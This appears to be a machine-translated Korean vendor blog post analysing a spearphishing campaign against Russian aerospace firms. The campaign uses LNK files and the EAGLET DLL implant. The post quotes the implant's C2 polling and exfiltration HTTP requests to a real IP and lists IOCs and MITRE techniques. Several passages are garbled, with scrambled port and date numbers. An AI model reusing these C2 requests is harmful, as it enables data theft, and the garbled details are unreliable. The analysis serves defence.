• 제품 & 서비스
        • 클라우드

          • 엔드 포인트 보호
          • 엔드 포인트 탐지 및 대응
          • 모바일 장치 관리
          • BYOD
          • 확장 된 탐지 및 대응
          • 제로 트러스트 네트워크 액세스
          • 데이터 개인 정보
        • 온프레미스

          • 엔드 포인트 보호
          • 엔드 포인트 탐지 및 대응
          • 데이터 개인 정보
        • 플랫폼

          • 악성코드 분석 플랫폼
        • 소기업

          • SOHO 토탈 에디션
        • 서비스

          • 위협 인텔
          • 디지털 위험 보호 서비스(DRPS)
          • 랜섬웨어 복구 서비스(RRaaS)
          • DPDP 준수
          • 관리되는 탐지 및 대응
  • 솔루션
    • BFSI
    • 교육
    • Government
    • 의료
    • ITeS
    • 제조업
  • 회사
    • Seqrite 소개
    • Leadership
    • 수상 및 인증
    • 뉴스 편집실
  • 파트너
    • 파트너 프로그램
    • 파트너 찾기
    • 파트너가 되십시오
  • 고객 지원
  • 자료
    • 블로그
    • 백서
    • 데이터시트
    • 고객 사례
    • 위협 보고서
    • 매뉴얼
    • POV
    • 데이터 개인 정보 보호 이해
    • DPDP 대화
정보 기술, 네트워크 및 사이버 보안 관련 블로그 | Seqrite 블로그
영업팀에 문의
  • 제품 & 서비스
        • 클라우드

          • 엔드 포인트 보호
          • 엔드 포인트 탐지 및 대응
          • 모바일 장치 관리
          • BYOD
          • 확장 된 탐지 및 대응
          • 제로 트러스트 네트워크 액세스
          • 데이터 개인 정보
        • 온프레미스

          • 엔드 포인트 보호
          • 엔드 포인트 탐지 및 대응
          • 데이터 개인 정보
        • 플랫폼

          • 악성코드 분석 플랫폼
        • 소기업

          • SOHO 토탈 에디션
        • 서비스

          • 위협 인텔
          • 디지털 위험 보호 서비스(DRPS)
          • 랜섬웨어 복구 서비스(RRaaS)
          • DPDP 준수
          • 관리되는 탐지 및 대응
  • 솔루션
    • BFSI
    • 교육
    • Government
    • 의료
    • ITeS
    • 제조업
  • 회사
    • Seqrite 소개
    • Leadership
    • 수상 및 인증
    • 뉴스 편집실
  • 파트너
    • 파트너 프로그램
    • 파트너 찾기
    • 파트너가 되십시오
  • 고객 지원
  • 자료
    • 블로그
    • 백서
    • 데이터시트
    • 고객 사례
    • 위협 보고서
    • 매뉴얼
    • POV
    • 데이터 개인 정보 보호 이해
    • DPDP 대화
홈  /  테크니컬  / Operation CargoTalon : UNG0901은 EAGLET 임플란트를 사용하여 러시아 항공우주 및 방위 산업을 표적으로 삼습니다.
카고탈론 작전: UNG0901은 EAGLET 임플란트를 사용하여 러시아 항공우주 및 방위 산업을 표적으로 삼습니다.
23 7월 2025

카고탈론 작전: UNG0901은 EAGLET 임플란트를 사용하여 러시아 항공우주 및 방위 산업을 표적으로 삼습니다.

Written by 수바지트 싱하
수바지트 싱하
테크니컬

목차

  • 개요
  • 초기 발견
  • 감염 사슬.
  • 기술 분석
    • 0단계 – 악성 이메일 파일.
    • 1단계 – 악성 LNK 파일.
    • 2단계 – 미끼 파일 살펴보기.
    • 3단계 – 악성 EAGLET 임플란트.
  • 사냥과 인프라.
    • 인프라 세부 정보.
    • 비슷한 캠페인.
  • 속성
  • 맺음말
  • SEQRITE 보호.
  • IOC
  • 미터 공격.

개요

SEQRITE Labs APT-Team은 최근 러시아 항공우주 산업을 표적으로 삼는 캠페인을 발견했습니다. 이 캠페인은 러시아의 주요 항공기 생산 기관 중 하나인 보로네시 항공기 생산 협회(VASO) 직원들을 표적으로 삼아 러시아 물류 운영에 필수적인 TTN(товарно-транспортная накладная) 문서를 사용하는 것을 목표로 합니다. 이 캠페인에 연루된 전체 악성코드 생태계는 악성 LNK 파일인 EAGLET DLL 임플랜트를 사용하여 악성 명령을 실행하고 데이터를 유출하는 방식을 기반으로 합니다.

이 블로그에서는 분석 과정에서 발견한 캠페인의 기술적 세부 사항을 살펴보겠습니다. 캠페인의 여러 단계를 살펴보겠습니다. 캠페인에 사용된 초기 감염 경로부터 임플란트까지 심층 분석하여 캠페인에 대한 최종 개요를 제공합니다.

초기 발견

최근 27월 XNUMX일, 저희 팀은 악성 스피어 피싱 첨부 파일을 사냥하던 중 다음과 같은 소스에서 악성 이메일 파일이 발견되었습니다. VirusTotal추가 조사를 진행한 결과, 악성 DLL 첨부 파일의 실행을 담당하는 악성 LNK 파일도 발견했는데, 이 파일의 파일 형식은 ZIP 첨부 파일로 위장되어 있었습니다.

이메일을 살펴본 결과, TRANSPORTORТная_накладная_ТТН_№391-44_от_26.06.2025.zip 파일이 발견되었습니다. 이 파일은 Transport_Consignment_Note_TTN_No.391-44_from_26.06.2025.zip으로 번역되는데, 기본적으로 DLL 파일입니다. 더 자세히 찾아보니 같은 이름의 바로가기 [LNK] 파일도 발견되었습니다. 그래서 이 파일들의 작동 방식을 조사하기로 했습니다.

감염 사슬

 

기술 분석

이 캠페인에 대한 분석을 세 부분으로 나누어 살펴보겠습니다. 먼저 악성 EML 파일을 살펴보고, 그 다음 첨부 파일, 악성 DLL 임플란트, LNK 파일을 살펴보겠습니다.

0단계 – 악성 이메일 파일.

음, 처음에 저희는 러시아 연방에서 업로드된 backup-message-10.2.2.20_9045-800282.eml이라는 악성 이메일 파일을 발견했습니다. 이후 해당 이메일 파일의 세부 정보를 조사했습니다.

우리는 해당 이메일이 운송 및 물류 센터의 보로네시 항공기 생산 협회(VASO) 직원에게 배송 안내서와 관련하여 전송되었음을 발견했습니다.

이메일 내용을 살펴보니 최근 물류 이동 소식을 전하기 위해 작성된 메시지였으며, 운송장(Consignment note)도 언급되어 있었습니다.Товарно-transportная накладная No391-44 от 26.06.2025), 이메일 내용은 수신자에게 2~3일 안에 특정 화물을 배송받을 준비를 하라고 촉구합니다. 공격자가 개인을 사칭한다는 사실을 이미 확인했기에, ZIP 파일로 위장한 악성 첨부 파일도 발견되었습니다. 다운로드 후, 악성 DLL 임플랜트임을 확인했습니다.

악성 DLL 임플란트와 별도로, 우리는 같은 이름의 악성 LNK 파일을 사냥했습니다. 이 파일은 다른 스피어 피싱 첨부 파일에 의해 삭제된 것으로 생각되며, 이 DLL 임플란트를 실행하는 데 사용됩니다. 이를 EAGLET이라고 명명했습니다.

다음 섹션에서는 악성 LNK 파일을 살펴보겠습니다.

1단계 – 악성 LNK 파일.

LNK 파일 내부를 살펴본 결과, 악성 DLL 파일을 실행하고 화면에 가짜 팝업을 생성하는 특정 작업을 수행하는 것으로 나타났습니다. 이 작업은 다음과 같은 방식으로 진행됩니다.

처음에는 powershell.exe 바이너리를 사용하여 백그라운드에서 스크립트를 실행하는데, 여기서는 악성 EAGLET 임플란트인 위장 ZIP 파일을 열거합니다. 그런 다음 악성 임플란트를 찾으면 rundll32.exe LOLBIN을 통해 이를 실행합니다. 찾지 못하면 %USERPROFILE%에서 재귀적으로 파일을 찾고, 찾으면 실행합니다. 그런 다음 해당 위치에서 파일을 찾지 못하면 %TEMP% 위치에서 찾아보려고 합니다.

DLL 임플랜트를 발견하면 해당 악성 프로그램이 실행되어 임플랜트 내에 내장된 디코이(decoy) XLS 파일을 추출합니다. 이는 시작 부분 59904바이트 바로 뒤에 저장된 296960바이트의 XLS 파일을 읽어서 %TEMP% 디렉터리에 ранспортная_накладная_ТТН_№391-44_от_26.06.2025.xls라는 이름으로 저장합니다. 이것이 악성 LNK 파일의 목적이며, 다음 섹션에서 디코이 파일을 살펴보겠습니다.

2단계 - 미끼 파일 살펴보기.

이 섹션에서는 DLL 임플란트에서 추출된 XLS 디코이 파일을 살펴보겠습니다.

처음에 저희는 참조된 .XLS 파일이 미국 재무부의 OFAC SDN(특별지정국가) 목록에 등재된 제재 대상 러시아 기관인 Obltransterminal LLC(ООО "Облтранстерминал")와 연관되어 있음을 확인했습니다. 해당 기관은 러시아의 군사 및 물류 인프라에 연루된 혐의로 행정명령 14024호에 따라 제재를 받았습니다.

그런 다음, XLS 파일에 컨테이너 번호, 유형, 공차 중량, 적재 용량, 봉인 번호, 그리고 차량 및 플랫폼 정보를 기록하는 구조화된 필드에 대한 세부 정보가 포함되어 있는 것을 확인했습니다. 특히, 컨테이너 상태(적재됨, 공차, 수리 중)를 확인하는 체크박스와 컨테이너의 물리적 손상을 표시하는 데 지정된 도식적 영역이 포함되어 있습니다.

그러면 우리는 미끼에 러시아 물류 작업에서 일반적으로 사용되는 컨테이너 손상 코드의 자세한 목록이 포함되어 있음을 알 수 있습니다.. 이 코드는 컨테이너 검사 중 발견될 수 있는 광범위한 구조적 및 기계적 문제를 포괄합니다. 균열 또는 구멍(Трещина), 상하부 보의 변형(Деформация верхних/нижних балок), 부식(Сквозная коррозия), 잠금 막대, 힌지, 고무 씰, 플레이트 및 모서리 피팅의 부재 또는 손상과 같은 특정 용어가 목록에 포함되어 있습니다. 각 손상 유형은 표준화된 검사 문서를 모방하여 1부터 24까지 체계적으로 번호가 매겨져 있습니다.

전반적으로 이 미끼는 기본적으로 공식 러시아 컨테이너 검사 문서를 시뮬레이션하는 것과 관련이 있습니다. 장비 교환 보고서(EIR) - 화물 컨테이너의 이전 또는 인계 시 사용됩니다. 여기에는 균열 및 변형부터 부식 및 관련 부품 누락까지 모든 것을 포괄하는 24개 손상 코드의 표준화된 목록과 함께 컨테이너 사양, 봉인 번호, 무게 및 차량 데이터에 대한 구조화된 필드가 포함됩니다. 오블트랜스터미널 LLC다음 섹션에서는 EAGLET 임플란트에 대해 살펴보겠습니다.

3단계 – 악성 EAGLET 임플란트.

처음에 임플란트를 보고 PE 분석 도구에 로드했을 때, 이것이 PE 파일이고 미끼는 오버레이 섹션 내부에 저장되어 있다는 것을 확인할 수 있었습니다. 이는 이전에 이미 확인했습니다.

다음으로, 이 악성 DLL의 내보내기를 살펴보았습니다. EntryPoint를 살펴봤지만, 안타깝게도 흥미로운 내용은 없었습니다. 다음으로 DllEntryPoint를 살펴보니 DllMain에 악성 동작과 관련된 흥미로운 코드가 포함되어 있었습니다.

흥미로운 초기 기능은 기본적으로 대상 머신의 정보를 열거하는 것입니다.

이 기능에서 코드는 대상의 고유한 GUID를 생성합니다. 이 GUID는 피해자를 식별하는 데 사용됩니다. 임플란트가 실행될 때마다 새로운 GUID가 생성됩니다. 이는 세션 ID의 동작을 모방하여 운영자나 위협 행위자가 대상에 대한 정보를 얻는 데 도움이 됩니다.

 

그런 다음 대상 컴퓨터의 컴퓨터 이름과 호스트 이름, DNS 도메인 이름을 나열합니다. 나열된 정보를 수신하면 ProgramData 위치에 MicrosoftApppStore라는 디렉터리를 생성합니다.

다음으로 CreateThread를 사용하여 명령 및 제어[C2] IP에 연결하는 등의 작업을 담당하는 악성 스레드를 생성합니다.

다음으로, 이 임플란트는 HTTP 세션을 시작하기 위해 WinHttpOpen과 같은 특정 Windows 네트워킹 API를 사용하고, 일반적이지 않은 사용자 에이전트 문자열인 MicrosoftAppStore/2001.0으로 위장한 다음, 포트 2을 통해 하드코딩된 명령 및 제어[C185.225.17.104] 서버인 80에 연결을 시도하는 WinHttpOpen과 같은 특정 Windows 네트워킹 API를 사용하고, 실패할 경우 계속해서 다시 시도합니다.

임플란트가 C2에 연결되면 URL 경로가 형성되고, 이 경로를 사용하여 C2 인프라에 GET 요청을 전송합니다. 전체 요청 본문은 다음과 같습니다.

GET /poll?id=<{무작위로 생성된 GUID}&hostname={hostname}&domain={domain} HTTP/1.1호스트: 185.225.17.104

요청을 보낸 후 임플란트는 다음을 시도합니다. HTTP 응답을 읽다 C2 서버에서 전송된 메시지에는 특정 명령을 수행하기 위한 지침이 포함되어 있을 수 있습니다.

기능성과 관련하여, 이 임플란트는 셸 액세스를 지원하는데, 이는 기본적으로 C2 운영자나 위협 행위자에게 대상 시스템에 셸을 제공하는데, 이를 사용하여 악의적인 활동을 수행할 수 있습니다.

이 임플란트의 또 다른 특징은 다운로드 기능입니다. 서버에서 악성 콘텐츠를 다운로드하거나 대상 컴퓨터에서 필요하거나 흥미로운 파일을 추출하는 기능입니다. 한 가지 기능은 서버에서 악성 콘텐츠를 다운로드하여 C:\ProgramData\MicrosoftAppStore\에 저장합니다. 현재 C2가 다운되어 이 연구가 발표되는 동안 사용되었거나 사용된 파일을 찾을 수 없었습니다.

나중에, 이 다운로드 기능과는 무관한 또 다른 기능도 분명해졌습니다. 이 임플란트는 기본적으로 대상 컴퓨터에서 파일을 추출하는 것이었습니다. 요청 본문은 다음과 같습니다.

POST /result HTTP/1.1Host: 185[.]225[.]17[.]104Content-Type: application/x-www-form-urlencoded id=8b9c0f52-e7d1-4d0f-b4de-fc62b4c4fa6f&hostname=VICTIM-PC&domain=CORP&result=Q29tbWFuZCByZXN1bHQgdGV4dA==

따라서 특징은 다음과 같다.

특색 트리거 키워드 행동 목적
명령 실행 명령: C2 서버로부터 수신된 쉘 명령을 실행하고 출력을 캡처합니다. 원격 코드 실행
다운로드 파일 다운로드 : 원격 위치에서 파일을 다운로드하여 C:\ProgramData\MicrosoftAppStore\에 저장합니다. 탑재체 스테이징
여과 (자동적 인) HTTP POST를 통해 명령 실행 결과나 다운로드 상태를 C2 서버로 전송합니다. 데이터 유출

EAGLET 임플란트에 대한 기술적 분석은 여기까지입니다. 다음으로 인프라 지식과 유사한 캠페인 사냥에 초점을 맞춘 다른 부분을 살펴보겠습니다.

사냥과 인프라

인프라 세부 사항

이 섹션에서는 인프라 관련 아티팩트를 살펴보겠습니다. 처음에는 EAGLET 임플란트 연결을 담당하는 C2(185[.]225[.]17[.]104)가 발견되었습니다. 이 C2 서버는 루마니아에 있으며, MivoCloud SRL의 ASN 39798을 사용합니다.

글쎄요, 조사해보니 많은 수동 DNS 레코드가 이전에 동일한 위협 클러스터와 연관되었던 과거 인프라를 가리키고 있었고 이는 TA505에 연결되어 있었습니다. 이는 연구원들이 조사한 것입니다. 바이너리디펜스DNS 레코드는 이 캠페인에 유사하거나 재활용된 인프라가 사용되었음을 시사합니다. 또한, 재활용 도메인 사용 측면에서 TA505와 인프라가 상호 연관되어 있다는 점 외에도, 다른 의심스러운 도메인에서도 동일한 인프라를 가리키는 DNS 레코드가 발견되었습니다. 앞서 언급한 정보를 제외하면, 현재 캠페인은 TA505와 아무런 상관관계가 없음을 확신할 수 있습니다.

항공우주 분야를 표적으로 삼은 이번 캠페인과 유사하게, 러시아 군사 분야를 표적으로 삼는 또 다른 캠페인도 발견되었습니다. 이 캠페인에서 위협 행위자는 EAGLET 임플란트를 사용했는데, 이 임플란트는 C2, 즉 188[.]127[.]254[.]44에 연결됩니다. 이 C56694는 러시아어로 ASN XNUMX로 등록되어 있으며, LLC Smart Ape 조직에 속합니다.

유사한 캠페인

캠페인 1 – 군사 테마 타겟팅

처음에 우리는 URL 본문과 임플란트의 다른 많은 행동적 아티팩트를 발견했고, 이를 통해 러시아 군 입대를 표적으로 삼아 정확히 유사한 임플란트를 사용한 또 다른 캠페인을 발견했습니다.

이 미끼는 Договор_РН83_изменения.zip이라는 이름의 EAGLET 임플란트에서 추출되었으며, Contract_RN83_Changes로 번역됩니다. 이 임플란트는 러시아 군 모집과 관련된 개인 및 단체를 표적으로 삼아 왔습니다. 보시다시피, 이 미끼는 주택 담보 대출부터 연금까지 복무의 여러 가지 이점을 강조합니다.

캠페인 2 – 미끼가 내장되지 않은 EAGLET 임플란트

이전 캠페인에서 위협 엔터티가 악성 LNK를 드롭하여 DLL 임플란트를 실행하고 임플란트 오버레이 섹션 내부에 있는 미끼를 추출하는 경우가 가끔 있었지만, 이번 캠페인에서는 미끼가 없는 임플란트도 확인했습니다.

이와 함께 우리는 유사한 타겟 관심사를 가진 이러한 캠페인의 여러 중복과 Head Mare로 알려진 위협 엔터티와 임플란트 코드가 중복되는 것을 보았습니다. 이 엔터티는 연구원들이 처음 발견한 러시아어 사용 엔터티를 표적으로 삼았습니다. 카스퍼 스키.

속성

귀속(attribution)은 위협 행위자나 집단을 설명할 때 필수적인 지표입니다. 여기에는 전술, 기법, 절차(TTP), 코드 유사성 및 재사용, 위협 행위자의 동기, 그리고 유사한 파일 또는 미끼 명명법 사용과 같은 운영상의 실수 등 다양한 영역을 분석하고 상관관계를 파악하는 것이 포함됩니다.

UNG0901에 대한 지속적인 추적을 통해 카스퍼스키 연구원들이 발견한 "헤드 메어(Head Mare)"라는 위협 그룹과 주목할 만한 유사점과 중복되는 부분을 발견했습니다. 헤드 메어와 UNG0901의 주요 중복 부분을 살펴보겠습니다.

UNG0901과 Head Mare 사이의 주요 중복

  1. 도구 무기고:

카스퍼스키 연구원들은 Head Mare가 PhantomDL이라는 Golang 기반 백도어를 자주 사용하는 것을 발견했습니다. 이 백도어는 UPX와 같은 소프트웨어 패키저를 사용하여 패키징되는데, 셸, 다운로드, 업로드, 종료 등 매우 간단하면서도 기능적인 기능을 제공합니다. 마찬가지로 UNG0901도 EAGLET 임플란트를 배포했는데, 이 임플란트는 유사한 동작을 보이며 셸, 다운로드, 업로드 등 거의 유사한 기능을 제공하며 C++로 프로그래밍되었습니다.

  1. 파일 명명 기술:

카스퍼스키 연구원들은 PhantomDL 악성코드가 Contract_kh02_523과 같은 파일 이름을 사용한 스피어피싱을 통해 자주 유포된다는 것을 발견했습니다. UNG0901이 목격한 캠페인에서도 Contract_RN83_Changes와 같은 유사한 파일 이름을 사용하는 경우가 많았습니다. 이외에도 유사한 파일 명명 방식이 많이 발견되었습니다.

  1. 동기 부여 :

Head Mare는 러시아와 관련된 중요한 기관을 표적으로 삼았고, UNG0901도 러시아에 속한 여러 중요한 기관을 표적으로 삼았습니다.

이 외에도 두 위협 실체 간의 연관성을 강화하는 많은 추가적이고 강력한 유사점이 있습니다. 따라서 UNG0901 위협 실체는 러시아 정부 및 비정부 기관을 표적으로 삼는 Head Mare와 자원을 공유하고 다른 많은 유사점을 가지고 있다고 생각합니다.

맺음말

UNG0901 또는 Unknown-Group-901은 러시아 항공우주 및 방위 산업을 겨냥한 표적 사이버 작전을 보여줍니다. 스피어피싱 이메일과 맞춤형 EAGLET DLL을 이용하여 간첩 및 데이터 유출을 목적으로 합니다. UNG0901은 Head Mare와도 겹치며, 미끼 명칭 등 여러 면에서 유사합니다.

SEQRITE 보호

  • 에이전트시알
  • 트로이 목마.49644.SL

IOC

파일 유형 파일 이름 SHA-256
LNK Договор_РН83_изменения.pdf.lnk a9324a1fa529e5c115232cbbc60330d37cef5c20860bafc63b11e14d1e75697c
TRANSPORTNая_накладная_ТТН_No391-44_от_26.06.2025.xls.lnk 4d4304d7ad1a8d0dacb300739d4dcaade299b28f8be3f171628a7358720ca6c5
DLL Договор_РН83_изменения.zip 204544fc8a8cac64bb07825a7bd58c54cb3e605707e2d72206ac23a1657bfe1e
Транспортная_накладная_ТТН_No391-44_от_26.06.2025.zip 01f12bb3f4359fae1138a194237914f4fcdbf9e472804e428a765ad820f399be
N/A b683235791e3106971269259026e05fdc2a4008f703ff2a4d32642877e57429a
Договор_РН83_изменения.zip 413c9e2963b8cca256d3960285854614e2f2e78dba023713b3dd67af369d5d08
미끼[XLS/ PDF] 임시.pdf 02098f872d00cffabb21bd2a9aa3888d994a0003d3aa1c80adcfb43023809786
샘플 추출.xls f6baa2b5e77e940fe54628f086926d08cc83c550cd2b4b34b4aab38fd79d2a0d
80650000 3e93c6cd9d31e0428085e620fdba017400e534f9b549d4041a5b0baaee4f7aff
샘플 추출.xls c3caa439c255b5ccd87a336b7e3a90697832f548305c967c0c40d2dc40e2032e
샘플 추출.xls 44ada9c8629d69dd3cf9662c521ee251876706ca3a169ca94c5421eb89e0d652
샘플 추출.xls e12f7ef9df1c42bc581a5f29105268f3759abea12c76f9cb4d145a8551064204
샘플 추출.xls a8fdc27234b141a6bd7a6791aa9cb332654e47a57517142b3140ecf5b0683401
이메일-파일 백업-메시지-10.2.2.20_9045-800282.eml ae736c2b4886d75d5bbb86339fb034d37532c1fee2252193ea4acc4d75d8bfd7

MITER ATT & CK

술책 기술 ID 세부 정보
초기 액세스 스피어피싱 첨부 파일 T1566.001 TTN 문서 미끼를 이용해 물류 센터를 사칭한 악성 .EML 파일이 VASO 직원에게 전송되었습니다.
실행 시스템 바이너리 프록시 실행: Rundll32 T1218.011 신뢰할 수 있는 rundll32.exe LOLBIN을 통해 실행되는 DLL 임플란트는 .LNK 파일에서 호출됩니다.
PowerShell을 T1059.001 여러 대체 디렉토리에서 DLL 임플란트를 찾아 실행하는 데 사용됩니다.
고집 ZIP으로 위장된 DLL에 이식 [커스텀] DLL은 .ZIP 파일로 위장합니다. 운영자가 제어하는 ​​실행을 통해 지속성이 내재되어 있습니다.
방어 회피 위장 T1036 ZIP으로 위장된 임플란트, 승인된 물류 서류를 가장하는 데 사용되는 미끼 XLS.
발견 시스템 정보 검색 T1082 호스트 이름, 컴퓨터 이름, 도메인을 수집하고, 대상을 식별하기 위해 피해자 GUID를 생성합니다.
도메인 트러스트 검색 T1482 네트워크 프로파일링을 위해 피해자의 DNS 도메인을 열거합니다.
명령 및 제어 애플리케이션 계층 프로토콜: HTTP T1071.001 HTTP를 통해 C2와 통신합니다. MicrosoftAppStore/2001.0 User-Agent를 사용합니다.
수집 로컬 시스템의 데이터 T1005 위협 행위자의 명령 트리거에 따라 시스템 세부 정보와 파일 내용을 추출합니다.
여과 C2 채널을 통한 유출 T1041 인코딩된 명령 결과나 유출된 데이터를 C2의 /result 엔드포인트에 POST 요청합니다.
영향 데이터 유출 T1537 러시아 항공우주 분야의 특정 대상을 표적으로 삼아 데이터를 훔쳤습니다.

저자 :

수바지트 싱하

사트윅 람 프라키

 이전 포스트은행 앱으로 위장한 안드로이드 크립토재커, 기기 위치 정보 악용
다음 포스트  사이버 보안에 있어 위협 인텔리전스가 빠진 고리인 이유...
수바지트 싱하

Subhajeet Singha 소개

Subhajeet은 Quick Heal의 보안 연구소에서 보안 연구원으로 일하고 있습니다. 그의 주요 분야는 위협 인텔리전스, 연구, 그리고 리버스 엔지니어링입니다.

Subhajeet Singha의 기사 »

관련 게시물

  • RTO 테마의 소셜 엔지니어링을 활용한 다단계 안드로이드 악성코드 캠페인의 내부 구조

    2026년 2월 4일
  • Operation DupeHike: UNG0902는 DUPERUNNER와 AdaptixC2를 이용해 러시아 직원을 표적으로 삼습니다.

    2026 년 1 월 20 일
  • 은밀한 접근 작전: 아르헨티나 사법 부문을 표적으로 삼은 LNK 기반 스피어 피싱 공격으로, 은밀한 RAT(원격 접속 트로이목마)를 배포하려 함

    은밀한 접근 작전: 아르헨티나 사법 부문을 표적으로 삼은 LNK 기반 스피어 피싱 공격으로, 은밀한 RAT(원격 접속 트로이목마)를 배포하려 함

    2026 년 1 월 19 일
추천 작가
  • 시크라이트
    시크라이트

    Seqrite는 선도적인 기업용 사이버 보안 솔루션 제공업체입니다.

    더 읽기 ..
  • 조티 칼레카르
    조티 칼레카르

    저는 새로운 기술과 관련된 콘텐츠를 만드는 것을 좋아하는 열렬한 작가입니다.

    더 읽기 ..
  • 비니쉬 P
    비니쉬 P

    저는 열정적인 사이버 보안 애호가이자 헌신적인 작가입니다. 재능을 가진...

    더 읽기 ..
  • 산제이 카트카르
    산제이 카트카르

    산제이 카트카르는 Quick Heal Technologies의 공동 전무이사입니다.

    더 읽기 ..
이상의 주제
적절한 (25) 사이버 공격 (36) 사이버 공격 (58) 사이버 공격 (16) 사이버 공격 (15) 사이버 보안 (335) 사이버 보안 (34) 사이버 위협 (33) 사이버 위협 (50) 데이터 위반 (56) 데이터 유출 (29) 데이터 손실 (28) 데이터 손실 방지 (34) 데이터 프라이버시 (15) 데이터 보호 (32) 데이터 보안 (17) DLP (50) DPDP (14) 디피디파 (16) 암호화 (16) 엔드 포인트 보안 (110) 엔터프라이즈 보안 (18) 공적 (13) GDPR (13) 악성 코드 (76) 악성 코드 분석 (13) 악성 코드 공격 (23) 맬웨어 공격 (12) MDM (27) Microsoft (15) 네트워크 보안 (24) 패치 관리 (12) 피싱 (29) 랜섬 (69) 중매 공격 (30) ransomware 공격 (30) 중매 보호 (14) 시크라이트 (41) Seqrite 암호화 (27) 시크라이트 EPS (33) Seqrite 서비스 (16) 그래프 기반 사이버 위협 인텔리전스 (13) UTM (34) 보안 문제 (16) 제로 트러스트 (13)
정보 기술, 네트워크 및 사이버 보안 관련 블로그 | Seqrite

전 세계적으로 최고 수준의 위협 예방, 탐지 및 대응 솔루션을 제공하여 엔드포인트, 데이터 및 네트워크 보안을 간소화하는 선도적인 기업 IT 보안 솔루션 제공업체입니다.

자세히 보기

우리를 따르십시오 :

우리의 뉴스 레터를 구독

최신 사이버보안 동향과 통찰력을 알아보세요.

로딩중
제품 & 서비스
  • 클라우드
  • 엔드 포인트 보호
  • 엔드 포인트 탐지 및 대응
  • 모바일 장치 관리
  • BYOD
  • 확장 된 탐지 및 대응
  • 제로 트러스트 네트워크 액세스
  • 데이터 개인 정보
  • 온프레미스
  • 엔드 포인트 보호
  • 엔드 포인트 탐지 및 대응
  • 데이터 개인 정보
  • 플랫폼
  • 악성코드 분석 플랫폼
  • 마이크로 비즈니스
  • SOHO 토탈 에디션
  • 서비스
  • 위협 인텔
  • 디지털 위험 보호 서비스(DRPS)
  • 랜섬웨어 복구 서비스(RRaaS)
  • DPDP 준수
  • 관리되는 탐지 및 대응
자료
  • 블로그
  • 백서
  • 데이터시트
  • 위협 보고서
  • 매뉴얼
  • POV
  • 데이터 개인 정보 보호 이해
  • DPDP 대화
  • 정책 및 규정 준수
  • EULA
  • 고딥.AI
  • SIA
문의하기
  • 등록 사무소
  • 가장 가까운 사무실
  • 사이버 보안에 대해 이야기해 봅시다
고객 지원
  • 기술 지원
  • 소프트웨어 다운로드
  • 오프라인 업데이터
  • 펌웨어 업그레이드
  • 업그레이드
  • 제품 설명서
브랜드 소개
  • Seqrite 소개
  • Leadership
  • 어워드 수상
  • 뉴스 편집실
되어보세요
  • 파트너 프로그램
  • 파트너 찾기
  • 파트너가 되십시오
  • Seqrite 인증

© 2026 퀵힐테크놀로지스 주식회사

사이트 맵 개인 정보 보호 정책 법적 고지 쿠키 정책 이용 약관